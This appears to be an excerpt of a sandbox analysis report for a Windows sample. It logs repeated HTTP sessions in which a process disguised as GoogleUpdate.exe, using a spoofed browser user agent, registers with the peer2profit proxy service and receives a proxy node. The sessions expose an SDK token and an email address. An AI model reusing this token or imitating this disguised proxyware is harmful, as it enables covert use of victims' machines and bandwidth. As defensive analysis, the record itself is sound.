2023-01-04 15:48:55 UTC	30	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.4	49837	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:48:56 UTC	30	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:48:56 UTC	30	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:48:56 UTC	30	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:48:56 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451f0cce6b5b86-FRA
2023-01-04 15:48:56 UTC	30	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.4	49840	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:48:56 UTC	30	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:48:56 UTC	31	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:48:57 UTC	31	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:48:57 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451f105bf2bbf1-FRA
2023-01-04 15:48:57 UTC	31	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.4	49843	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:48:57 UTC	31	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:48:57 UTC	31	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:48:57 UTC	32	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:48:57 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451f12580a2c29-FRA
2023-01-04 15:48:57 UTC	32	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.4	49846	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:48:57 UTC	32	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:48:57 UTC	32	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:48:58 UTC	32	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:48:58 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451f14588fbb5b-FRA
2023-01-04 15:48:58 UTC	32	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.4	49851	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:48:58 UTC	33	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:48:58 UTC	33	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:48:58 UTC	33	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:48:58 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451f1bbc309972-FRA
2023-01-04 15:48:58 UTC	33	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.4	49855	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:00 UTC	33	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:00 UTC	33	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:00 UTC	34	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:00 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451f2789555c3e-FRA
2023-01-04 15:49:00 UTC	34	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49712	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:48:22 UTC	3	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:48:22 UTC	3	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:48:22 UTC	3	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:48:22 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451e3909549b40-FRA
2023-01-04 15:48:22 UTC	4	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.4	49858	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:02 UTC	34	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:02 UTC	34	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:02 UTC	34	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:02 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451f334c225c44-FRA
2023-01-04 15:49:02 UTC	34	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.4	49861	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:04 UTC	35	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:04 UTC	35	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:04 UTC	35	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:04 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451f3da86c2c3e-FRA
2023-01-04 15:49:04 UTC	35	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.4	49864	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:06 UTC	35	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:06 UTC	35	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:06 UTC	36	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:06 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451f4dd83c924f-FRA
2023-01-04 15:49:06 UTC	36	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.4	49867	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:09 UTC	36	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:09 UTC	36	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:09 UTC	36	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:09 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451f5bccfe9bf8-FRA
2023-01-04 15:49:09 UTC	37	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.4	49870	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:13 UTC	37	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
